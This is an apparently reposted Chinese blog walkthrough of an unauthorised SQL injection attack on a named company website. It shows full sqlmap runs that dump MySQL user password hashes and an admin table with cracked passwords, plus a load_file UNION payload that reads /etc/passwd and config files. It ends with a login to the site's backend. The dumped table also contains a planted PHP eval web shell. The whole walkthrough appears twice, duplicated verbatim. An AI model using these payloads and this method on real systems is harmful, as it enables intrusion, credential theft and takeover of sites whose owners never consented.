sql注入进阶--跑向mysql
2016-07-11 13:32
411 查看
1、之前也是google关键字搜索,找到了一个相对有点难度的网站http://www.konzern.com.cn/about/index.php?id=2
2、测试什么的就不用说了,直接sqlmap跑起来。
(1)先看看是什么数据库吧,废话,不是已经剧透了吗。
c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --dbs
_
___ ___| |_____ ___ ___ {1.0.6.66#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 11:37:26
[11:37:26] [INFO] resuming back-end DBMS 'mysql'
[11:37:26] [INFO] testing connection to the target URL
[11:37:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4222=4222
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:37:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:37:27] [INFO] fetching database names
[11:37:27] [WARNING] the SQL query provided does not return any output
[11:37:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:37:27] [INFO] fetching number of databases
[11:37:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:37:27] [INFO] retrieved:
[11:37:31] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:37:51] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[11:37:52] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[11:37:52] [ERROR] unable to retrieve the number of databases
[11:37:52] [INFO] falling back to current database
[11:37:52] [INFO] fetching current database
available databases [1]:
[*] kg
[11:37:52] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'
[*] shutting down at 11:37:52
结果显示数据库是mysql,数据库名kg,杜兰特的缩写,尼玛这开发是球迷吗,不过杜兰特去了勇士,这一选择,作为男人有点抱大腿,不过也是有苦衷吧,今年西部总决赛第七场,一个队友3米内没人不敢投,气的杜兰特吼。
(2)既然是mysql就先拿到数据库用户名和密码呗
c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --current-user
_
___ ___| |_____ ___ ___ {1.0.6.66#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 11:38:12
[11:38:13] [INFO] resuming back-end DBMS 'mysql'
[11:38:13] [INFO] testing connection to the target URL
[11:38:14] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4222=4222
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:38:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:38:14] [INFO] fetching current user
current user: 'root@localhost'
[11:38:14] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'
[*] shutting down at 11:38:14
从这里可以看出当前用户是本地用户,说明数据库和web服务是在同一台服务器上的。
c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --password
_
___ ___| |_____ ___ ___ {1.0.6.66#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 11:38:26
[11:38:26] [INFO] resuming back-end DBMS 'mysql'
[11:38:26] [INFO] testing connection to the target URL
[11:38:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4222=4222
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:38:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:38:27] [INFO] fetching database users password hashes
[11:38:27] [INFO] the SQL query used returns 15 entries
[11:38:27] [INFO] retrieved: "root",""
[11:38:28] [INFO] retrieved: "root",""
[11:38:28] [INFO] retrieved: "",""
[11:38:28] [INFO] retrieved: "",""
[11:38:28] [INFO] retrieved: "coremail","*B3FA81D652FE904AE8EEB21507D03E45C5C...
[11:38:29] [INFO] retrieved: "tslocal","*6928D47E7D6B188943617D47B312DB23355A...
[11:38:30] [INFO] retrieved: "ts24","*F51239D6AA282385073A599091A2FDB38E06420D"
[11:38:30] [INFO] retrieved: "konzern","*5CA9DC02DE7B499F9252B93DC1C3197BE55C...
[11:38:33] [INFO] retrieved: "konzern","*5CA9DC02DE7B499F9252B93DC1C3197BE55C...
[11:38:34] [INFO] retrieved: "monitor","*DA34EBCBAD8C5A4F67284295C6B70810926F...
[11:38:34] [INFO] retrieved: "monitor","*DA34EBCBAD8C5A4F67284295C6B70810926F...
[11:38:34] [INFO] retrieved: "root",""
[11:38:34] [INFO] retrieved: "butt","*196BDEDE2AE4F84CA44C47D54D78478C7E2BD7B7"
[11:38:34] [INFO] retrieved: "server","*866D5A029D62EC05ACC4584CE50F1CD2F50E0...
[11:38:38] [INFO] retrieved: "mysqld","*83D34C89B8E0F100D54C6D9276D357DB43E87...
[*] shutting down at 11:39:22
为什么这么多数据库用户,因为数据库本身就自带了很多用户
(3)还是看看网站的管理员用户名和密码吧
c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --dump -T admin
_
___ ___| |_____ ___ ___ {1.0.6.66#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 11:56:13
[11:56:13] [INFO] resuming back-end DBMS 'mysql'
[11:56:13] [INFO] testing connection to the target URL
[11:56:16] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4222=4222
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:56:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:56:16] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[11:56:16] [INFO] fetching current database
[11:56:16] [INFO] fetching columns for table 'admin' in database 'kg'
[11:56:16] [WARNING] the SQL query provided does not return any output
[11:56:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:56:16] [WARNING] unable to retrieve column names for table 'admin' in database 'kg'
[11:56:16] [INFO] fetching entries for table 'admin' in database 'kg'
[11:56:16] [INFO] the SQL query used returns 22 entries
[11:56:17] [INFO] analyzing table dump for possible password hashes
[11:56:17] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[11:56:19] [INFO] writing hashes to a temporary file 'c:\users\jlz\appdata\local\temp\sqlmaponae9o3480\sqlmaphashes-qdvld9.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[11:56:21] [INFO] using hash method 'md5_generic_passwd'
[11:56:21] [INFO] resuming password 'test2' for hash 'ad0234829205b9033196ba818f7a872b'
[11:56:21] [INFO] resuming password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e'
[11:56:21] [INFO] resuming password 'test123' for hash 'cc03e747a6afbbcbf8be7668acfebee5'
[11:56:21] [INFO] resuming password 'jodie' for hash '8a8ec34de8f52073fcacf4c974a7cea0'
[11:56:21] [INFO] resuming password '123' for hash '202cb962ac59075b964b07152d234b70'
[11:56:21] [INFO] resuming password 'leo' for hash '0f759dd1ea6c4c76cedc299039ca4f23'
[11:56:21] [INFO] resuming password 'world' for hash '7d793037a0760186574b0282f2f435e7'
[11:56:21] [INFO] resuming password 'alice' for hash '6384e2b2184bcbf58eccf10ca7a6563c'
[11:56:21] [INFO] resuming password '123698745' for hash '4438fc033f8aef433f9db5348b70e8e5'
[11:56:21] [INFO] resuming password '666666' for hash 'f379eaf3c831b04de153469d1bec345e'
what dictionary do you want to use?
[1] default dictionary file 'C:\Python27\sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[11:56:22] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[11:56:23] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[11:56:23] [INFO] starting 4 processes
[11:56:29] [INFO] current status: 12606... \
[11:56:29] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
[11:56:29] [INFO] postprocessing table dump
Database: kg
Table: admin
[22 entries]
+----+----------------------------------------------+--------------------------+
| id | pwd | user |
+----+----------------------------------------------+--------------------------+
| 12 | bfdb222d429e677e138895c7fbf44721 | konzern |
| 81 | f379eaf3c831b04de153469d1bec345e (666666) | hacker |
| 80 | 4438fc033f8aef433f9db5348b70e8e5 (123698745) | leigege |
| 79 | ef529f393e47059de5b6656856829fee | sky |
| 77 | 6384e2b2184bcbf58eccf10ca7a6563c (alice) | alice |
| 78 | 4438fc033f8aef433f9db5348b70e8e5 (123698745) | yaoleigegea |
| 76 | 7d793037a0760186574b0282f2f435e7 (world) | hello |
| 73 | 202cb962ac59075b964b07152d234b70 (123) | 123 |
| 74 | 9573f82f0adff976411bc4ba919450af | dai |
| 75 | 2c219676360ae415f5b25bf777661f4a | lio |
| 70 | dcb62acff5a147575ebd1f406c0912dd | fomok |
| 71 | 41d4bc20d6cc020a996cb9a6d11f8eeb | weimian |
| 66 | cc03e747a6afbbcbf8be7668acfebee5 (test123) | test1 |
| 69 | 8a8ec34de8f52073fcacf4c974a7cea0 (jodie) | jodie |
| 68 | ad0234829205b9033196ba818f7a872b (test2) | test2 |
| 72 | e10adc3949ba59abbe56e057f20f883e (123456) | <?php eval($_POST[g]);?> |
| 67 | 6f87ab65bc137da2781cabddf5dc1e1a | timo |
| 64 | 1e3851d424d29e3ea3771c90d9e07865 | lao |
| 65 | 202cb962ac59075b964b07152d234b70 (123) | anonymous |
| 63 | 0f759dd1ea6c4c76cedc299039ca4f23 (leo) | leo |
| 62 | 202cb962ac59075b964b07152d234b70 (123) | test |
| 61 | f379eaf3c831b04de153469d1bec345e (666666) | hacker |
+----+----------------------------------------------+--------------------------+
[11:56:29] [INFO] table 'kg.admin' dumped to CSV file 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn\dump\kg\admin.csv'
[11:56:29] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'
[*] shutting down at 11:56:29
尼玛,竟然有人已经入侵了,不过这种小儿科也没什么技术含量,还留了个脚印用户hacker。
(4)到了这里就要找后台吧,回来再搞shell,因为猜后台也是个技术活。网站后台光靠猜也没用啊,通过sqlmap用户root@localhost可以看出来是linux
那我先试试查询本地密码表/etc/passwd
果然,是linux而且有读取本地文件权限,应该是root用户,这里用的是火狐浏览器,并且装了个插件,将hex进行转码。
(5)这个就直接都源文件了,看看有没有配置文件的信息。
错误信息爆出了绝对路径
输入http://www.konzern.com.cn/about/index.php?id=2%20and%201=2%20union%20select%20load_file(%27/home/webroot/kg/product/indexinfo.php%27%20),1查看源代码
看到根目录下面的config.php文件。
找到这个就好了 同理,查看config.pyp
又转了一圈,到了mywebmanange/conn.php,到了链接字符串文件了。
(6)这时候可以试试mywebmanage路径是不是管理员后台 http://www.konzern.com.cn/mywebmanage/web_manage.php
刚才读到的数据库密码试试
ok进入后台,
4、系统提权 以后再说吧
2、测试什么的就不用说了,直接sqlmap跑起来。
(1)先看看是什么数据库吧,废话,不是已经剧透了吗。
c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --dbs
_
___ ___| |_____ ___ ___ {1.0.6.66#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 11:37:26
[11:37:26] [INFO] resuming back-end DBMS 'mysql'
[11:37:26] [INFO] testing connection to the target URL
[11:37:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4222=4222
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:37:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:37:27] [INFO] fetching database names
[11:37:27] [WARNING] the SQL query provided does not return any output
[11:37:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:37:27] [INFO] fetching number of databases
[11:37:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:37:27] [INFO] retrieved:
[11:37:31] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:37:51] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[11:37:52] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[11:37:52] [ERROR] unable to retrieve the number of databases
[11:37:52] [INFO] falling back to current database
[11:37:52] [INFO] fetching current database
available databases [1]:
[*] kg
[11:37:52] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'
[*] shutting down at 11:37:52
结果显示数据库是mysql,数据库名kg,杜兰特的缩写,尼玛这开发是球迷吗,不过杜兰特去了勇士,这一选择,作为男人有点抱大腿,不过也是有苦衷吧,今年西部总决赛第七场,一个队友3米内没人不敢投,气的杜兰特吼。
(2)既然是mysql就先拿到数据库用户名和密码呗
c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --current-user
_
___ ___| |_____ ___ ___ {1.0.6.66#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 11:38:12
[11:38:13] [INFO] resuming back-end DBMS 'mysql'
[11:38:13] [INFO] testing connection to the target URL
[11:38:14] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4222=4222
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:38:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:38:14] [INFO] fetching current user
current user: 'root@localhost'
[11:38:14] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'
[*] shutting down at 11:38:14
从这里可以看出当前用户是本地用户,说明数据库和web服务是在同一台服务器上的。
c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --password
_
___ ___| |_____ ___ ___ {1.0.6.66#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 11:38:26
[11:38:26] [INFO] resuming back-end DBMS 'mysql'
[11:38:26] [INFO] testing connection to the target URL
[11:38:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4222=4222
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:38:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:38:27] [INFO] fetching database users password hashes
[11:38:27] [INFO] the SQL query used returns 15 entries
[11:38:27] [INFO] retrieved: "root",""
[11:38:28] [INFO] retrieved: "root",""
[11:38:28] [INFO] retrieved: "",""
[11:38:28] [INFO] retrieved: "",""
[11:38:28] [INFO] retrieved: "coremail","*B3FA81D652FE904AE8EEB21507D03E45C5C...
[11:38:29] [INFO] retrieved: "tslocal","*6928D47E7D6B188943617D47B312DB23355A...
[11:38:30] [INFO] retrieved: "ts24","*F51239D6AA282385073A599091A2FDB38E06420D"
[11:38:30] [INFO] retrieved: "konzern","*5CA9DC02DE7B499F9252B93DC1C3197BE55C...
[11:38:33] [INFO] retrieved: "konzern","*5CA9DC02DE7B499F9252B93DC1C3197BE55C...
[11:38:34] [INFO] retrieved: "monitor","*DA34EBCBAD8C5A4F67284295C6B70810926F...
[11:38:34] [INFO] retrieved: "monitor","*DA34EBCBAD8C5A4F67284295C6B70810926F...
[11:38:34] [INFO] retrieved: "root",""
[11:38:34] [INFO] retrieved: "butt","*196BDEDE2AE4F84CA44C47D54D78478C7E2BD7B7"
[11:38:34] [INFO] retrieved: "server","*866D5A029D62EC05ACC4584CE50F1CD2F50E0...
[11:38:38] [INFO] retrieved: "mysqld","*83D34C89B8E0F100D54C6D9276D357DB43E87...
[*] shutting down at 11:39:22
为什么这么多数据库用户,因为数据库本身就自带了很多用户
(3)还是看看网站的管理员用户名和密码吧
c:\Python27\sqlmap>sqlmap.py -u http://www.konzern.com.cn/about/index.php?id=2 --dump -T admin
_
___ ___| |_____ ___ ___ {1.0.6.66#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any
misuse or damage caused by this program
[*] starting at 11:56:13
[11:56:13] [INFO] resuming back-end DBMS 'mysql'
[11:56:13] [INFO] testing connection to the target URL
[11:56:16] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 4222=4222
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8220=BENCHMARK(5000000,MD5(0x58466d44))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-7699 UNION ALL SELECT CONCAT(0x7170717071,0x65665577634e784367596844557554664e6e45757947745955615469565a4741437167627648536c,0x7176766b71),NULL-- wfqe
---
[11:56:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.9
back-end DBMS: MySQL <= 5.0.11
[11:56:16] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[11:56:16] [INFO] fetching current database
[11:56:16] [INFO] fetching columns for table 'admin' in database 'kg'
[11:56:16] [WARNING] the SQL query provided does not return any output
[11:56:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:56:16] [WARNING] unable to retrieve column names for table 'admin' in database 'kg'
[11:56:16] [INFO] fetching entries for table 'admin' in database 'kg'
[11:56:16] [INFO] the SQL query used returns 22 entries
[11:56:17] [INFO] analyzing table dump for possible password hashes
[11:56:17] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[11:56:19] [INFO] writing hashes to a temporary file 'c:\users\jlz\appdata\local\temp\sqlmaponae9o3480\sqlmaphashes-qdvld9.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[11:56:21] [INFO] using hash method 'md5_generic_passwd'
[11:56:21] [INFO] resuming password 'test2' for hash 'ad0234829205b9033196ba818f7a872b'
[11:56:21] [INFO] resuming password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e'
[11:56:21] [INFO] resuming password 'test123' for hash 'cc03e747a6afbbcbf8be7668acfebee5'
[11:56:21] [INFO] resuming password 'jodie' for hash '8a8ec34de8f52073fcacf4c974a7cea0'
[11:56:21] [INFO] resuming password '123' for hash '202cb962ac59075b964b07152d234b70'
[11:56:21] [INFO] resuming password 'leo' for hash '0f759dd1ea6c4c76cedc299039ca4f23'
[11:56:21] [INFO] resuming password 'world' for hash '7d793037a0760186574b0282f2f435e7'
[11:56:21] [INFO] resuming password 'alice' for hash '6384e2b2184bcbf58eccf10ca7a6563c'
[11:56:21] [INFO] resuming password '123698745' for hash '4438fc033f8aef433f9db5348b70e8e5'
[11:56:21] [INFO] resuming password '666666' for hash 'f379eaf3c831b04de153469d1bec345e'
what dictionary do you want to use?
[1] default dictionary file 'C:\Python27\sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[11:56:22] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[11:56:23] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[11:56:23] [INFO] starting 4 processes
[11:56:29] [INFO] current status: 12606... \
[11:56:29] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
[11:56:29] [INFO] postprocessing table dump
Database: kg
Table: admin
[22 entries]
+----+----------------------------------------------+--------------------------+
| id | pwd | user |
+----+----------------------------------------------+--------------------------+
| 12 | bfdb222d429e677e138895c7fbf44721 | konzern |
| 81 | f379eaf3c831b04de153469d1bec345e (666666) | hacker |
| 80 | 4438fc033f8aef433f9db5348b70e8e5 (123698745) | leigege |
| 79 | ef529f393e47059de5b6656856829fee | sky |
| 77 | 6384e2b2184bcbf58eccf10ca7a6563c (alice) | alice |
| 78 | 4438fc033f8aef433f9db5348b70e8e5 (123698745) | yaoleigegea |
| 76 | 7d793037a0760186574b0282f2f435e7 (world) | hello |
| 73 | 202cb962ac59075b964b07152d234b70 (123) | 123 |
| 74 | 9573f82f0adff976411bc4ba919450af | dai |
| 75 | 2c219676360ae415f5b25bf777661f4a | lio |
| 70 | dcb62acff5a147575ebd1f406c0912dd | fomok |
| 71 | 41d4bc20d6cc020a996cb9a6d11f8eeb | weimian |
| 66 | cc03e747a6afbbcbf8be7668acfebee5 (test123) | test1 |
| 69 | 8a8ec34de8f52073fcacf4c974a7cea0 (jodie) | jodie |
| 68 | ad0234829205b9033196ba818f7a872b (test2) | test2 |
| 72 | e10adc3949ba59abbe56e057f20f883e (123456) | <?php eval($_POST[g]);?> |
| 67 | 6f87ab65bc137da2781cabddf5dc1e1a | timo |
| 64 | 1e3851d424d29e3ea3771c90d9e07865 | lao |
| 65 | 202cb962ac59075b964b07152d234b70 (123) | anonymous |
| 63 | 0f759dd1ea6c4c76cedc299039ca4f23 (leo) | leo |
| 62 | 202cb962ac59075b964b07152d234b70 (123) | test |
| 61 | f379eaf3c831b04de153469d1bec345e (666666) | hacker |
+----+----------------------------------------------+--------------------------+
[11:56:29] [INFO] table 'kg.admin' dumped to CSV file 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn\dump\kg\admin.csv'
[11:56:29] [INFO] fetched data logged to text files under 'C:\Users\jlz\.sqlmap\output\www.konzern.com.cn'
[*] shutting down at 11:56:29
尼玛,竟然有人已经入侵了,不过这种小儿科也没什么技术含量,还留了个脚印用户hacker。
(4)到了这里就要找后台吧,回来再搞shell,因为猜后台也是个技术活。网站后台光靠猜也没用啊,通过sqlmap用户root@localhost可以看出来是linux
那我先试试查询本地密码表/etc/passwd
果然,是linux而且有读取本地文件权限,应该是root用户,这里用的是火狐浏览器,并且装了个插件,将hex进行转码。
(5)这个就直接都源文件了,看看有没有配置文件的信息。
错误信息爆出了绝对路径
输入http://www.konzern.com.cn/about/index.php?id=2%20and%201=2%20union%20select%20load_file(%27/home/webroot/kg/product/indexinfo.php%27%20),1查看源代码
看到根目录下面的config.php文件。
找到这个就好了 同理,查看config.pyp
又转了一圈,到了mywebmanange/conn.php,到了链接字符串文件了。
(6)这时候可以试试mywebmanage路径是不是管理员后台 http://www.konzern.com.cn/mywebmanage/web_manage.php
刚才读到的数据库密码试试
ok进入后台,
4、系统提权 以后再说吧
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- mysql语句里时间格式化
- MySQL一行多列求和sum()函数
- yum install mysql
- 常用的Mysql数据库操作语句大全
- mysql update 联表
- mysql获取某个表的所有字段名
- 关于使用Mysql(SqlYog)中文乱码的问题
- 脚本下运行MySql语句
- mysql timeout connection
- mysql修改密码
- navicat for mysql 注册码
- MySQL查看某条sql的execute trace信息
- mysql 5.7忘记密码处理
- mysql主从复制Error1205
- MySQL有关ip地址的优化存储
- mysql密码忘记如何处理
- MAC下安装与配置MySQL
- MySQL _LOAD DATA 导入 csv 文件到数据库表操作日志
- MYSQL错误代码对照大全
- MySqL触发器以及常用转换函数注意事项